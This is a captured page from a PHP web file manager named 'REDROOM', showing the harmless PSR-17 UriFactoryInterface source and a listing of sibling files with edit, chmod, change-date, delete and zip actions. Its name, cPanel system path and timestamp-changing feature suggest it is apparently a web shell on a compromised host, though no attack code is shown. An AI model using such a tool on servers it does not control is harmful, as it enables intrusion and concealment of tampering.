REDROOM
PHP 8.2.31
Path:
Logout
Edit File
Size: 325 B
Close
//opt/cpanel/ea-wappspector/vendor/psr/http-factory/src/UriFactoryInterface.php
Text
Base64
<?php namespace Psr\Http\Message; interface UriFactoryInterface { /** * Create a new URI. * * @param string $uri * * @return UriInterface * * @throws \InvalidArgumentException If the given URI cannot be parsed. */ public function createUri(string $uri = ''): UriInterface; }
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 6
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
RequestFactoryInterface.php
499 B
lrw-r--r--
2024-04-15 12:06:14
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
ResponseFactoryInterface.php
546 B
lrw-r--r--
2024-04-15 12:06:14
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
ServerRequestFactoryInterface.php
927 B
lrw-r--r--
2024-04-15 12:06:14
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
StreamFactoryInterface.php
1.38 KB
lrw-r--r--
2024-04-15 12:06:14
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
UploadedFileFactoryInterface.php
1.10 KB
lrw-r--r--
2024-04-15 12:06:14
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
UriFactoryInterface.php
325 B
lrw-r--r--
2024-04-15 12:06:14
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).